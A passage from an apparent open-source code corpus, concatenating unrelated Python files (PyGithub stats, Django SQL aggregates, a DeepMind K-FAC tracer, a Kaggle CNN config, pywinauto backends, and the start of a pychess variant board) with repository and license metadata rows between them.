# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
# ##############################################################################
import github.GithubObject
import github.NamedUser
class StatsPunchCard(github.GithubObject.NonCompletableGithubObject):
"""
This class represents the punch card. The reference can be found here http://developer.github.com/v3/repos/statistics/#get-the-number-of-commits-per-hour-in-each-day
"""
def get(self, day, hour):
"""
Get a specific element
:param day: int
:param hour: int
:rtype: int
"""
return self._dict[(day, hour)]
def _initAttributes(self):
self._dict = {}
def _useAttributes(self, attributes):
for day, hour, commits in attributes:
self._dict[(day, hour)] = commits
| gpl-3.0 |
pdehaye/theming-edx-platform | common/lib/capa/capa/safe_exec/lazymod.py | 68 | 1207 | """A module proxy for delayed importing of modules.
From http://barnesc.blogspot.com/2006/06/automatic-python-imports-with-autoimp.html,
in the public domain.
"""
import sys
class LazyModule(object):
"""A lazy module proxy."""
def __init__(self, modname):
self.__dict__['__name__'] = modname
self._set_mod(None)
def _set_mod(self, mod):
if mod is not None:
self.__dict__ = mod.__dict__
self.__dict__['_lazymod_mod'] = mod
def _load_mod(self):
__import__(self.__name__)
self._set_mod(sys.modules[self.__name__])
def __getattr__(self, name):
if self.__dict__['_lazymod_mod'] is None:
self._load_mod()
mod = self.__dict__['_lazymod_mod']
if hasattr(mod, name):
return getattr(mod, name)
else:
try:
subname = '%s.%s' % (self.__name__, name)
__import__(subname)
submod = getattr(mod, name)
except ImportError:
raise AttributeError("'module' object has no attribute %r" % name)
self.__dict__[name] = LazyModule(subname, submod)
return self.__dict__[name]
| agpl-3.0 |
sendit2me/kaggle-ndsb | configurations/bagging_00_convroll4_big_wd_maxout512.py | 6 | 5478 | import numpy as np
import theano
import theano.tensor as T
import lasagne as nn
import data
import load
import nn_plankton
import dihedral
import dihedral_fast
import tmp_dnn
import tta
validation_split_path = "splits/bagging_split_0.pkl"
patch_size = (95, 95)
augmentation_params = {
'zoom_range': (1 / 1.6, 1.6),
'rotation_range': (0, 360),
'shear_range': (-20, 20),
'translation_range': (-10, 10),
'do_flip': True,
'allow_stretch': 1.3,
}
batch_size = 128 // 4
chunk_size = 32768 // 4
num_chunks_train = 840
momentum = 0.9
learning_rate_schedule = {
0: 0.003,
700: 0.0003,
800: 0.00003,
}
validate_every = 20
save_every = 20
def estimate_scale(img):
return np.maximum(img.shape[0], img.shape[1]) / 85.0
# augmentation_transforms_test = []
# for flip in [True, False]:
# for zoom in [1/1.3, 1/1.2, 1/1.1, 1.0, 1.1, 1.2, 1.3]:
# for rot in np.linspace(0.0, 360.0, 5, endpoint=False):
# tf = data.build_augmentation_transform(zoom=(zoom, zoom), rotation=rot, flip=flip)
# augmentation_transforms_test.append(tf)
augmentation_transforms_test = tta.build_quasirandom_transforms(70, **{
'zoom_range': (1 / 1.4, 1.4),
'rotation_range': (0, 360),
'shear_range': (-10, 10),
'translation_range': (-8, 8),
'do_flip': True,
'allow_stretch': 1.2,
})
data_loader = load.ZmuvRescaledDataLoader(estimate_scale=estimate_scale, num_chunks_train=num_chunks_train,
patch_size=patch_size, chunk_size=chunk_size, augmentation_params=augmentation_params,
augmentation_transforms_test=augmentation_transforms_test, validation_split_path=validation_split_path)
# Conv2DLayer = nn.layers.cuda_convnet.Conv2DCCLayer
# MaxPool2DLayer = nn.layers.cuda_convnet.MaxPool2DCCLayer
Conv2DLayer = tmp_dnn.Conv2DDNNLayer
MaxPool2DLayer = tmp_dnn.MaxPool2DDNNLayer
def build_model():
l0 = nn.layers.InputLayer((batch_size, 1, patch_size[0], patch_size[1]))
l0c = dihedral.CyclicSliceLayer(l0)
l1a = Conv2DLayer(l0c, num_filters=32, filter_size=(3, 3), border_mode="same", W=nn_plankton.Conv2DOrthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=nn_plankton.leaky_relu, untie_biases=True)
l1b = Conv2DLayer(l1a, num_filters=16, filter_size=(3, 3), border_mode="same", W=nn_plankton.Conv2DOrthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=nn_plankton.leaky_relu, untie_biases=True)
l1 = MaxPool2DLayer(l1b, ds=(3, 3), strides=(2, 2))
l1r = dihedral_fast.CyclicConvRollLayer(l1)
l2a = Conv2DLayer(l1r, num_filters=64, filter_size=(3, 3), border_mode="same", W=nn_plankton.Conv2DOrthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=nn_plankton.leaky_relu, untie_biases=True)
l2b = Conv2DLayer(l2a, num_filters=32, filter_size=(3, 3), border_mode="same", W=nn_plankton.Conv2DOrthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=nn_plankton.leaky_relu, untie_biases=True)
l2 = MaxPool2DLayer(l2b, ds=(3, 3), strides=(2, 2))
l2r = dihedral_fast.CyclicConvRollLayer(l2)
l3a = Conv2DLayer(l2r, num_filters=128, filter_size=(3, 3), border_mode="same", W=nn_plankton.Conv2DOrthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=nn_plankton.leaky_relu, untie_biases=True)
l3b = Conv2DLayer(l3a, num_filters=128, filter_size=(3, 3), border_mode="same", W=nn_plankton.Conv2DOrthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=nn_plankton.leaky_relu, untie_biases=True)
l3c = Conv2DLayer(l3b, num_filters=64, filter_size=(3, 3), border_mode="same", W=nn_plankton.Conv2DOrthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=nn_plankton.leaky_relu, untie_biases=True)
l3 = MaxPool2DLayer(l3c, ds=(3, 3), strides=(2, 2))
l3r = dihedral_fast.CyclicConvRollLayer(l3)
l4a = Conv2DLayer(l3r, num_filters=256, filter_size=(3, 3), border_mode="same", W=nn_plankton.Conv2DOrthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=nn_plankton.leaky_relu, untie_biases=True)
l4b = Conv2DLayer(l4a, num_filters=256, filter_size=(3, 3), border_mode="same", W=nn_plankton.Conv2DOrthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=nn_plankton.leaky_relu, untie_biases=True)
l4c = Conv2DLayer(l4b, num_filters=128, filter_size=(3, 3), border_mode="same", W=nn_plankton.Conv2DOrthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=nn_plankton.leaky_relu, untie_biases=True)
l4 = MaxPool2DLayer(l4c, ds=(3, 3), strides=(2, 2))
l4r = dihedral_fast.CyclicConvRollLayer(l4)
l4f = nn.layers.flatten(l4r)
l5 = nn.layers.DenseLayer(nn.layers.dropout(l4f, p=0.5), num_units=1024, W=nn_plankton.Orthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=None)
l5fp = nn.layers.FeaturePoolLayer(l5, ds=2)
l5r = dihedral_fast.CyclicRollLayer(l5fp)
l6 = nn.layers.DenseLayer(nn.layers.dropout(l5r, p=0.5), num_units=1024, W=nn_plankton.Orthogonal(1.0), b=nn.init.Constant(0.1), nonlinearity=None)
l6fp = nn.layers.FeaturePoolLayer(l6, ds=2)
l6m = dihedral.CyclicPoolLayer(l6fp, pool_function=nn_plankton.rms)
l7 = nn.layers.DenseLayer(nn.layers.dropout(l6m, p=0.5), num_units=data.num_classes, nonlinearity=T.nnet.softmax, W=nn_plankton.Orthogonal(1.0))
return [l0], l7
def build_objective(l_ins, l_out):
lambda_reg = 0.0005
params = nn.layers.get_all_non_bias_params(l_out)
reg_term = sum(T.sum(p**2) for p in params)
def loss(y, t):
return nn_plankton.log_loss(y, t) + lambda_reg * reg_term
return nn.objectives.Objective(l_out, loss_function=loss)
| mit |
linjoahow/2015cda_lego | static/Brython3.1.3-20150514-095342/Lib/reprlib.py | 923 | 5110 | """Redo the builtin repr() (representation) but with limits on most sizes."""
__all__ = ["Repr", "repr", "recursive_repr"]
import builtins
from itertools import islice
try:
from _thread import get_ident
except ImportError:
from _dummy_thread import get_ident
def recursive_repr(fillvalue='...'):
'Decorator to make a repr function return fillvalue for a recursive call'
def decorating_function(user_function):
repr_running = set()
def wrapper(self):
key = id(self), get_ident()
if key in repr_running:
return fillvalue
repr_running.add(key)
try:
result = user_function(self)
finally:
repr_running.discard(key)
return result
# Can't use functools.wraps() here because of bootstrap issues
wrapper.__module__ = getattr(user_function, '__module__')
wrapper.__doc__ = getattr(user_function, '__doc__')
wrapper.__name__ = getattr(user_function, '__name__')
wrapper.__annotations__ = getattr(user_function, '__annotations__', {})
return wrapper
return decorating_function
class Repr:
def __init__(self):
self.maxlevel = 6
self.maxtuple = 6
self.maxlist = 6
self.maxarray = 5
self.maxdict = 4
self.maxset = 6
self.maxfrozenset = 6
self.maxdeque = 6
self.maxstring = 30
self.maxlong = 40
self.maxother = 30
def repr(self, x):
return self.repr1(x, self.maxlevel)
def repr1(self, x, level):
typename = type(x).__name__
if ' ' in typename:
parts = typename.split()
typename = '_'.join(parts)
if hasattr(self, 'repr_' + typename):
return getattr(self, 'repr_' + typename)(x, level)
else:
return self.repr_instance(x, level)
def _repr_iterable(self, x, level, left, right, maxiter, trail=''):
n = len(x)
if level <= 0 and n:
s = '...'
else:
newlevel = level - 1
repr1 = self.repr1
pieces = [repr1(elem, newlevel) for elem in islice(x, maxiter)]
if n > maxiter: pieces.append('...')
s = ', '.join(pieces)
if n == 1 and trail: right = trail + right
return '%s%s%s' % (left, s, right)
def repr_tuple(self, x, level):
return self._repr_iterable(x, level, '(', ')', self.maxtuple, ',')
def repr_list(self, x, level):
return self._repr_iterable(x, level, '[', ']', self.maxlist)
def repr_array(self, x, level):
header = "array('%s', [" % x.typecode
return self._repr_iterable(x, level, header, '])', self.maxarray)
def repr_set(self, x, level):
x = _possibly_sorted(x)
return self._repr_iterable(x, level, 'set([', '])', self.maxset)
def repr_frozenset(self, x, level):
x = _possibly_sorted(x)
return self._repr_iterable(x, level, 'frozenset([', '])',
self.maxfrozenset)
def repr_deque(self, x, level):
return self._repr_iterable(x, level, 'deque([', '])', self.maxdeque)
def repr_dict(self, x, level):
n = len(x)
if n == 0: return '{}'
if level <= 0: return '{...}'
newlevel = level - 1
repr1 = self.repr1
pieces = []
for key in islice(_possibly_sorted(x), self.maxdict):
keyrepr = repr1(key, newlevel)
valrepr = repr1(x[key], newlevel)
pieces.append('%s: %s' % (keyrepr, valrepr))
if n > self.maxdict: pieces.append('...')
s = ', '.join(pieces)
return '{%s}' % (s,)
def repr_str(self, x, level):
s = builtins.repr(x[:self.maxstring])
if len(s) > self.maxstring:
i = max(0, (self.maxstring-3)//2)
j = max(0, self.maxstring-3-i)
s = builtins.repr(x[:i] + x[len(x)-j:])
s = s[:i] + '...' + s[len(s)-j:]
return s
def repr_int(self, x, level):
s = builtins.repr(x) # XXX Hope this isn't too slow...
if len(s) > self.maxlong:
i = max(0, (self.maxlong-3)//2)
j = max(0, self.maxlong-3-i)
s = s[:i] + '...' + s[len(s)-j:]
return s
def repr_instance(self, x, level):
try:
s = builtins.repr(x)
# Bugs in x.__repr__() can cause arbitrary
# exceptions -- then make up something
except Exception:
return '<%s instance at %x>' % (x.__class__.__name__, id(x))
if len(s) > self.maxother:
i = max(0, (self.maxother-3)//2)
j = max(0, self.maxother-3-i)
s = s[:i] + '...' + s[len(s)-j:]
return s
def _possibly_sorted(x):
# Since not all sequences of items can be sorted and comparison
# functions may raise arbitrary exceptions, return an unsorted
# sequence in that case.
try:
return sorted(x)
except Exception:
return list(x)
aRepr = Repr()
repr = aRepr.repr
| agpl-3.0 |
gdi2290/django | django/db/models/sql/aggregates.py | 18 | 4842 | """
Classes to represent the default SQL aggregate functions
"""
import copy
import warnings
from django.db.models.fields import IntegerField, FloatField
from django.db.models.lookups import RegisterLookupMixin
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.functional import cached_property
__all__ = ['Aggregate', 'Avg', 'Count', 'Max', 'Min', 'StdDev', 'Sum', 'Variance']
warnings.warn(
"django.db.models.sql.aggregates is deprecated. Use "
"django.db.models.aggregates instead.",
RemovedInDjango20Warning, stacklevel=2)
class Aggregate(RegisterLookupMixin):
"""
Default SQL Aggregate.
"""
is_ordinal = False
is_computed = False
sql_template = '%(function)s(%(field)s)'
def __init__(self, col, source=None, is_summary=False, **extra):
"""Instantiate an SQL aggregate
* col is a column reference describing the subject field
of the aggregate. It can be an alias, or a tuple describing
a table and column name.
* source is the underlying field or aggregate definition for
the column reference. If the aggregate is not an ordinal or
computed type, this reference is used to determine the coerced
output type of the aggregate.
* extra is a dictionary of additional data to provide for the
aggregate definition
Also utilizes the class variables:
* sql_function, the name of the SQL function that implements the
aggregate.
* sql_template, a template string that is used to render the
aggregate into SQL.
* is_ordinal, a boolean indicating if the output of this aggregate
is an integer (e.g., a count)
* is_computed, a boolean indicating if this output of this aggregate
is a computed float (e.g., an average), regardless of the input
type.
"""
self.col = col
self.source = source
self.is_summary = is_summary
self.extra = extra
# Follow the chain of aggregate sources back until you find an
# actual field, or an aggregate that forces a particular output
# type. This type of this field will be used to coerce values
# retrieved from the database.
tmp = self
while tmp and isinstance(tmp, Aggregate):
if getattr(tmp, 'is_ordinal', False):
tmp = self._ordinal_aggregate_field
elif getattr(tmp, 'is_computed', False):
tmp = self._computed_aggregate_field
else:
tmp = tmp.source
self.field = tmp
# Two fake fields used to identify aggregate types in data-conversion operations.
@cached_property
def _ordinal_aggregate_field(self):
return IntegerField()
@cached_property
def _computed_aggregate_field(self):
return FloatField()
def relabeled_clone(self, change_map):
clone = copy.copy(self)
if isinstance(self.col, (list, tuple)):
clone.col = (change_map.get(self.col[0], self.col[0]), self.col[1])
return clone
def as_sql(self, compiler, connection):
"Return the aggregate, rendered as SQL with parameters."
params = []
if hasattr(self.col, 'as_sql'):
field_name, params = self.col.as_sql(compiler, connection)
elif isinstance(self.col, (list, tuple)):
field_name = '.'.join(compiler(c) for c in self.col)
else:
field_name = compiler(self.col)
substitutions = {
'function': self.sql_function,
'field': field_name
}
substitutions.update(self.extra)
return self.sql_template % substitutions, params
def get_group_by_cols(self):
return []
@property
def output_field(self):
return self.field
class Avg(Aggregate):
is_computed = True
sql_function = 'AVG'
class Count(Aggregate):
is_ordinal = True
sql_function = 'COUNT'
sql_template = '%(function)s(%(distinct)s%(field)s)'
def __init__(self, col, distinct=False, **extra):
super(Count, self).__init__(col, distinct='DISTINCT ' if distinct else '', **extra)
class Max(Aggregate):
sql_function = 'MAX'
class Min(Aggregate):
sql_function = 'MIN'
class StdDev(Aggregate):
is_computed = True
def __init__(self, col, sample=False, **extra):
super(StdDev, self).__init__(col, **extra)
self.sql_function = 'STDDEV_SAMP' if sample else 'STDDEV_POP'
class Sum(Aggregate):
sql_function = 'SUM'
class Variance(Aggregate):
is_computed = True
def __init__(self, col, sample=False, **extra):
super(Variance, self).__init__(col, **extra)
self.sql_function = 'VAR_SAMP' if sample else 'VAR_POP'
| bsd-3-clause |
deepmind/deepmind-research | kfac_ferminet_alpha/tracer.py | 1 | 13233 | # Copyright 2020 DeepMind Technologies Limited.
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for the Jax tracer functionality for tags."""
import functools
from typing import Any, Callable, Sequence, Tuple
import jax
from jax import core
from jax import util as jax_util
import jax.numpy as jnp
from kfac_ferminet_alpha import layers_and_loss_tags as tags
from kfac_ferminet_alpha import tag_graph_matcher as tgm
from kfac_ferminet_alpha import utils
_Function = Callable[[Any], Any]
_Loss = tags.LossTag
def extract_tags(
jaxpr: core.Jaxpr
) -> Tuple[Sequence[core.JaxprEqn], Sequence[core.JaxprEqn]]:
"""Extracts all of the tag equations."""
# Loop through equations and evaluate primitives using `bind`
layer_tags = []
loss_tags = []
for eqn in jaxpr.eqns:
if isinstance(eqn.primitive, tags.LossTag):
loss_tags.append(eqn)
elif isinstance(eqn.primitive, tags.LayerTag):
layer_tags.append(eqn)
return tuple(layer_tags), tuple(loss_tags)
def construct_compute_losses_inputs(
jaxpr: core.Jaxpr,
consts: Tuple[Any],
num_losses: int,
primals: Any,
params_index: int) -> Callable[[Any], Sequence[Sequence[jnp.ndarray]]]:
"""Constructs a function that computes all of the inputs to all losses."""
primals_ = list(primals)
def forward_compute_losses(
params_primals: Any,
) -> Sequence[Sequence[jnp.ndarray]]:
primals_[params_index] = params_primals
flat_args = jax.tree_flatten(primals_)[0]
# Mapping from variable -> value
env = dict()
read = functools.partial(tgm.read_env, env)
write = functools.partial(tgm.write_env, env)
# Bind args and consts to environment
write(jax.core.unitvar, jax.core.unit)
jax_util.safe_map(write, jaxpr.invars, flat_args)
jax_util.safe_map(write, jaxpr.constvars, consts)
# Loop through equations and evaluate primitives using `bind`
losses_so_far = 0
loss_tags = []
for eqn in jaxpr.eqns:
tgm.evaluate_eqn(eqn, jax_util.safe_map(read, eqn.invars), write)
if isinstance(eqn.primitive, tags.LossTag):
loss_tags.append(eqn)
losses_so_far += 1
if num_losses is not None and losses_so_far == num_losses:
break
return tuple(tuple(read(v) for v in tag.invars) for tag in loss_tags)
# return tuple(jax_util.safe_map(read, tag.invars) for tag in loss_tags)
return forward_compute_losses
# We know when `.primitive` will be either a `LossTag` or a `LayerTag`, however
# pytype cannot infer its subclass, so we need to unbox it.
def _unbox_loss_tag(jaxpr_eqn: core.JaxprEqn) -> tags.LossTag:
assert isinstance(jaxpr_eqn.primitive, tags.LossTag)
return jaxpr_eqn.primitive
def _unbox_layer_tag(jaxpr_eqn: core.JaxprEqn) -> tags.LayerTag:
assert isinstance(jaxpr_eqn.primitive, tags.LayerTag)
return jaxpr_eqn.primitive
def trace_losses_matrix_vector_vjp(tagged_func: _Function,
params_index: int = 0):
"""Returns the Jacobian-transposed vector product (backward mode) function in equivalent form to jax.vjp."""
def vjp(*primals):
typed_jaxpr = jax.make_jaxpr(tagged_func)(*primals)
jaxpr, consts = typed_jaxpr.jaxpr, typed_jaxpr.literals
_, loss_jaxpr_eqns = extract_tags(jaxpr)
n = len(loss_jaxpr_eqns)
losses_func = construct_compute_losses_inputs(
jaxpr, consts, n, primals, params_index)
losses_inputs, full_vjp_func = jax.vjp(losses_func, primals[params_index])
losses = []
for jaxpr_eqn, inputs in zip(loss_jaxpr_eqns, losses_inputs):
loss_tag = _unbox_loss_tag(jaxpr_eqn)
losses.append(loss_tag.loss(*inputs, weight=jaxpr_eqn.params["weight"]))
losses = tuple(losses)
def vjp_func(tangents):
flat_tangents = jax.tree_flatten(tangents)[0]
loss_invars = []
loss_targets = []
for jaxpr_eqn, inputs in zip(loss_jaxpr_eqns, losses_inputs):
num_inputs = _unbox_loss_tag(jaxpr_eqn).num_inputs
loss_invars.append(tuple(jaxpr_eqn.invars[:num_inputs]))
loss_targets.append(inputs[num_inputs:])
treedef = jax.tree_structure(loss_invars)
tangents = jax.tree_unflatten(treedef, flat_tangents)
# Since the losses could also take and targets as inputs and we don't want
# this function to computes vjp w.r.t to those (e.g. the user should not
# be providing tangent vectors for the targets, only for inputs) we have
# to manually fill in these "extra" tangents with zeros.
targets_tangents = jax.tree_map(jnp.zeros_like, loss_targets)
tangents = tuple(ti + tti for ti, tti in zip(tangents, targets_tangents))
input_tangents = full_vjp_func(tangents)[0]
return input_tangents,
return losses, vjp_func
return vjp
def trace_losses_matrix_vector_jvp(
tagged_func: _Function,
params_index: int = 0):
"""Returns the Jacobian vector product (forward mode) function in equivalent form to jax.jvp."""
def jvp(primals, params_tangents):
typed_jaxpr = jax.make_jaxpr(tagged_func)(*primals)
jaxpr, consts = typed_jaxpr.jaxpr, typed_jaxpr.literals
_, loss_tags = extract_tags(jaxpr)
n = len(loss_tags)
losses_func = construct_compute_losses_inputs(jaxpr, consts, n,
primals, params_index)
primals = (primals[params_index],)
tangents = (params_tangents,)
(primals_out, tangents_out) = jax.jvp(losses_func, primals, tangents)
tangents_out = tuple(tuple(t[:tag.primitive.num_inputs])
for t, tag in zip(tangents_out, loss_tags))
losses = tuple(tag.primitive.loss(*inputs, weight=tag.params["weight"])
for tag, inputs in zip(loss_tags, primals_out))
return losses, tangents_out
return jvp
def trace_losses_matrix_vector_hvp(tagged_func, params_index=0):
"""Returns the Hessian vector product function of **the tagged losses**, rather than the output value of `tagged_func`."""
# The function uses backward-over-forward mode.
def hvp(primals, params_tangents):
typed_jaxpr = jax.make_jaxpr(tagged_func)(*primals)
jaxpr, consts = typed_jaxpr.jaxpr, typed_jaxpr.literals
_, loss_tags = extract_tags(jaxpr)
n = len(loss_tags)
losses_func = construct_compute_losses_inputs(
jaxpr, consts, n, primals, params_index)
def losses_sum(param_primals):
loss_inputs = losses_func(param_primals)
losses = [
_unbox_loss_tag(jaxpr_eqn).loss(
*inputs, weight=jaxpr_eqn.params["weight"])
for jaxpr_eqn, inputs in zip(loss_tags, loss_inputs)
]
# This computes the sum of losses evaluated. Makes it easier as we can
# now use jax.grad rather than jax.vjp for taking derivatives.
return sum(jnp.sum(loss.evaluate(None)) for loss in losses)
def grads_times_tangents(params_primals):
grads = jax.grad(losses_sum)(params_primals)
return utils.inner_product(grads, params_tangents)
return jax.grad(grads_times_tangents)(primals[params_index])
return hvp
def trace_estimator_vjp(tagged_func: _Function) -> _Function:
"""Creates the function needed for an estimator of curvature matrices.
Args:
tagged_func: An function that has been annotated with tags both for layers
and losses.
Returns:
A function with the same signatures as `tagged_func`, which when provided
with inputs returns two things:
1. The instances of all losses objected that are tagged.
2. A second function, which when provide with tangent vectors for each
of the loss instances' parameters, returns for every tagged layer a
dictionary containing the following elements:
inputs - The primal values of the inputs to the layer.
outputs - The primal values of the outputs to the layer.
params - The primal values of the layer.
inputs_tangent - The tangent value of layer, given the provided
tangents of the losses.
inputs_tangent - The tangent value of layer, given the provided
tangents of the losses.
inputs_tangent - The tangent value of layer, given the provided
tangents of the losses.
"""
def full_vjp_func(func_args):
# Trace the tagged function
typed_jaxpr = jax.make_jaxpr(tagged_func)(*func_args)
jaxpr, consts = typed_jaxpr.jaxpr, typed_jaxpr.literals
layer_tags, loss_tags = extract_tags(jaxpr)
layer_vars_flat = jax.tree_flatten([tag.invars for tag in layer_tags])[0]
layer_input_vars = tuple(set(layer_vars_flat))
def forward():
own_func_args = func_args
# Mapping from variable -> value
env = dict()
read = functools.partial(tgm.read_env, env)
write = functools.partial(tgm.write_env, env)
# Bind args and consts to environment
write(jax.core.unitvar, jax.core.unit)
jax_util.safe_map(write, jaxpr.invars, jax.tree_flatten(own_func_args)[0])
jax_util.safe_map(write, jaxpr.constvars, consts)
# Loop through equations and evaluate primitives using `bind`
num_losses_passed = 0
for eqn in jaxpr.eqns:
tgm.evaluate_eqn(eqn, jax_util.safe_map(read, eqn.invars), write)
if isinstance(eqn.primitive, tags.LossTag):
num_losses_passed += 1
if num_losses_passed == len(loss_tags):
break
if num_losses_passed != len(loss_tags):
raise ValueError("This should be unreachable.")
return jax_util.safe_map(read, layer_input_vars)
def forward_aux(aux):
own_func_args = func_args
# Mapping from variable -> value
env = dict()
read = functools.partial(tgm.read_env, env)
def write(var, val):
if not isinstance(var, (jax.core.Literal, jax.core.UnitVar)):
val = val + aux[var] if var in aux else val
env[var] = val
# Bind args and consts to environment
write(jax.core.unitvar, jax.core.unit)
jax_util.safe_map(write, jaxpr.invars, jax.tree_flatten(own_func_args)[0])
jax_util.safe_map(write, jaxpr.constvars, consts)
# Loop through equations and evaluate primitives using `bind`
num_losses_passed = 0
losses_inputs_values = []
losses_kwargs_values = []
for eqn in jaxpr.eqns:
input_values = jax_util.safe_map(read, eqn.invars)
tgm.evaluate_eqn(eqn, input_values, write)
if isinstance(eqn.primitive, tags.LossTag):
loss = eqn.primitive.loss(*input_values, weight=eqn.params["weight"])
losses_inputs_values.append(loss.inputs)
losses_kwargs_values.append(dict(
targets=loss.targets,
weight=eqn.params["weight"]
))
num_losses_passed += 1
if num_losses_passed == len(loss_tags):
break
if num_losses_passed != len(loss_tags):
raise ValueError("This should be unreachable.")
# Read the inputs to the loss functions, but also return the target values
return tuple(losses_inputs_values), tuple(losses_kwargs_values)
layer_input_values = forward()
primals_dict = dict(zip(layer_input_vars, layer_input_values))
primals_dict.update(zip(jaxpr.invars, jax.tree_flatten(func_args)[0]))
aux_values = jax.tree_map(jnp.zeros_like, layer_input_values)
aux_dict = dict(zip(layer_input_vars, aux_values))
losses_args, aux_vjp, losses_kwargs = jax.vjp(forward_aux, aux_dict,
has_aux=True)
losses = tuple(tag.primitive.loss(*inputs, **kwargs)
for tag, inputs, kwargs in
zip(loss_tags, losses_args, losses_kwargs))
def vjp_func(tangents):
all_tangents = aux_vjp(tangents)
tangents_dict, inputs_tangents = all_tangents[0], all_tangents[1:]
inputs_tangents = jax.tree_flatten(inputs_tangents)[0]
tangents_dict.update(zip(jaxpr.invars, inputs_tangents))
read_primals = functools.partial(tgm.read_env, primals_dict)
read_tangents = functools.partial(tgm.read_env, tangents_dict)
layers_info = []
for jaxpr_eqn in layer_tags:
layer_tag = _unbox_layer_tag(jaxpr_eqn)
info = dict()
primals = jax_util.safe_map(read_primals, tuple(jaxpr_eqn.invars))
(
info["outputs"],
info["inputs"],
info["params"],
) = layer_tag.split_all_inputs(primals)
tangents = jax_util.safe_map(read_tangents, tuple(jaxpr_eqn.invars))
(
info["outputs_tangent"],
info["inputs_tangent"],
info["params_tangent"],
) = layer_tag.split_all_inputs(tangents)
layers_info.append(info)
return tuple(layers_info)
return losses, vjp_func
return full_vjp_func
| apache-2.0 |
vasily-v-ryabov/pywinauto | pywinauto/backend.py | 4 | 4186 | # GUI Application automation and testing library
# Copyright (C) 2006-2018 Mark Mc Mahon and Contributors
# https://github.com/pywinauto/pywinauto/graphs/contributors
# http://pywinauto.readthedocs.io/en/latest/credits.html
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of pywinauto nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Back-end components storage (links to platform-specific things)"""
from .element_info import ElementInfo
from .base_wrapper import BaseWrapper
class BackEnd(object):
"""Minimal back-end description (name & 2 required base classes)"""
def __init__(self, name, element_info_class, generic_wrapper_class):
"""Init back-end description"""
self.name = name
if not issubclass(element_info_class, ElementInfo):
raise TypeError('element_info_class should be a class derived from ElementInfo')
if not issubclass(generic_wrapper_class, BaseWrapper):
raise TypeError('element_info_class should be a class derived from BaseWrapper')
self.element_info_class = element_info_class
self.generic_wrapper_class = generic_wrapper_class
class BackendsRegistry(object):
"""Registry pattern class for the list of available back-ends"""
def __init__(self):
"""Init back-ends list (it doesn't aware of concrete back-ends yet)"""
self.backends = {}
self.active_backend = None
@property
def name(self):
"""Name of the active backend"""
return self.active_backend.name
@property
def element_class(self):
"""Return :py:class:`.element_info.ElementInfo`'s subclass of the active backend"""
return self.active_backend.element_info_class
@property
def wrapper_class(self):
"""BaseWrapper's subclass of the active backend"""
return self.active_backend.generic_wrapper_class
registry = BackendsRegistry()
def name():
"""Return name of the active backend"""
return registry.name
def element_class():
"""Return :py:class:`.element_info.ElementInfo`'s subclass of the active backend"""
return registry.element_class
def wrapper_class():
"""Return BaseWrapper's subclass of the active backend"""
return registry.wrapper_class
def activate(name):
"""
Set active backend by name
Possible values of **name** are "win32", "uia" or
other name registered by the :py:func:`register` function.
"""
if name not in registry.backends:
raise ValueError('Back-end "{backend}" is not registered!'.format(backend=name))
registry.active_backend = registry.backends[name]
def register(name, element_info_class, generic_wrapper_class):
"""Register a new backend"""
registry.backends[name] = BackEnd(name, element_info_class, generic_wrapper_class)
| bsd-3-clause |
RosiePy/pychess | lib/pychess/Variants/asymmetricrandom.py | 20 | 4155 | from __future__ import print_function
# AsymmetricRandom Chess
import random
from pychess.Utils.const import *
from pychess.Utils.Board import Board
class AsymmetricRandomBoard(Board):
variant = ASYMMETRICRANDOMCHESS
def __init__ (self, setup=False, lboard=None):
if setup is True:
Board.__init__(self, setup=self.asymmetricrandom_start(), lboard=lboard)
else:
Board.__init__(self, setup=setup, lboard=lboard)
def asymmetricrandom_start(self):
white = random.sample(('r', 'n', 'b', 'q')*16, 7)
white.append('k')
black = white[:]
random.shuffle(white)
random.shuffle(black)
# balance the bishops (put them on equal numbers of dark and light squares)
whitedarkbishops = 0
whitelightbishops = 0
for index, piece in enumerate(white):
if piece == 'b':
if index % 2 == 0: # even numbered square on the A rank are dark
whitedarkbishops += 1
else:
